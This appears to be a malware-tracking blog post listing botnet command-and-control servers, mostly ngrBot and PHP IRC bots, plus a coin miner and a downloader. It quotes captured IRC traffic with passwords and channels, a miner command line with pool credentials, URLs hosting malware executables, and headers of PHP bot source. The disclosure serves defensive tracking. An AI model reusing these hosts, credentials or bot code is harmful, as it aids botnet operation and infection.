xxxd2.com(ngrBot hosted in United States Clarks Summit Volumedrive)

Resolved : [xxxd2.com] To [199.168.140.38] Remote Host Port Number 173.192.224.115 80 199.15.234.7 80 199.168.140.38 7777 PASS Eshuxx NICK n{US|XPa}evkfwgc USER evkfwgc 0 0 :evkfwgc JOIN #eshu Eshuxx PRIVMSG #eshu :[d=”http://www.fotosprivadas.com/chicas/update/Ruco.exe” s=”172032 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 Sample hosting infos: http://whois.domaintools.com/199.168.140.38

new.pusikuracbre.me(CoinMiner hosted in Russian Federation Selectel Ltd.)

From same lamer here http://www.exposedbotnets.com/search?q=8332 Sample Sample Sample Resolved : [new.pusikuracbre.me] To [31.186.102.181] Resolved : [new.pusikuracbre.me] To [31.186.102.180] Resolved : [new.pusikuracbre.me] To [31.186.102.155] Running process miner.exe -a 60 -g no -o http://new.pusikuracbre.me:8332/ -u d38a39ys_l3kpy -p el29djggss Xandora results here hosting infos: http://whois.domaintools.com/31.186.102.180

75.77.40.195(ngrBot hosted in United States Greenville Windstream Nuvox Inc)

Remote Host Port Number 199.15.234.7 80 75.77.40.195 6668 PASS ngrBot PRIVMSG #asiksi# :[DNS]: Blocked “windowsupdate.microsoft.com” NICK n{US|XPa}vxpwwmw USER vxpwwmw 0 0 :vxpwwmw JOIN #asiksi# asdr3ny PRIVMSG #asiksi# :[DNS]: Blocked “www.microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “update.microsoft.com” Now talking in #asiksi# Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.com

v1.0 Ultimate phpB(Linux bots hosted in Brazil Comite Gestor Da Internet No Brasil)

Albanian hecker using php bots to flood irc channels ##################################################################### #v1.0 Ultimate phpB. Enjoy ! ! ! ! ! # # # # # # # # Fixed By TiRoNcI_BoY® # # Albhack@msn.com # ##################################################################### <? set_time_limit(0); error_reporting(0); class pBot { ####################### V1.0 CONFIGURATION ######################## var $config = array("server"=>"189.30.30.10", # "port"=>6667, //port do server #

irc.ganyot.us.to(Linux bots hosted in Korea, Republic Of Seoul Hanbiro)

I found this link http://focori.com.br/images/x.php it was a php shell uploaded to vulnerable site inside i found the bot used for exploiting vulnerable sites <? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot

cube.sdeirc.net(ngrBot hosted in Netherlands Amsterdam Ecatel Ltd)

Our anonymous friend pointed this url http://cbteam.ws/(inside u have samples) i checked files and i found this botnet wich i allready posted ip’s in the blog Resolved : [cube.sdeirc.net] To [89.248.166.139] Remote Host Port Number cube.sdeirc.net 7392 PASS none NICK New{US-XP-x86}1124207 USER 1124207 “” “1124207” :1124207 MODE New{US-XP-x86}1124207 +iMmx JOIN #a secret JOIN #rndbot zrag

LilyJade Software (malware downloader hosted in United States Redmond Microsoft Corp)

Got the sample from our anonymous friend and here is what it does 1.downloads file installer.gif GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: stats.crossrider.com Connection: Keep-Alive Cache-Control: no-cache 2.downloads and install fake chrome The data identified by the following URLs was then requested from the remote web server: http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes http://crt.usertrust.com/AddTrustExternalCARoot.p7c http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2 http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0 http://crl.verisign.com/pca3.crl http://crl.verisign.com/ThawteTimestampingCA.crl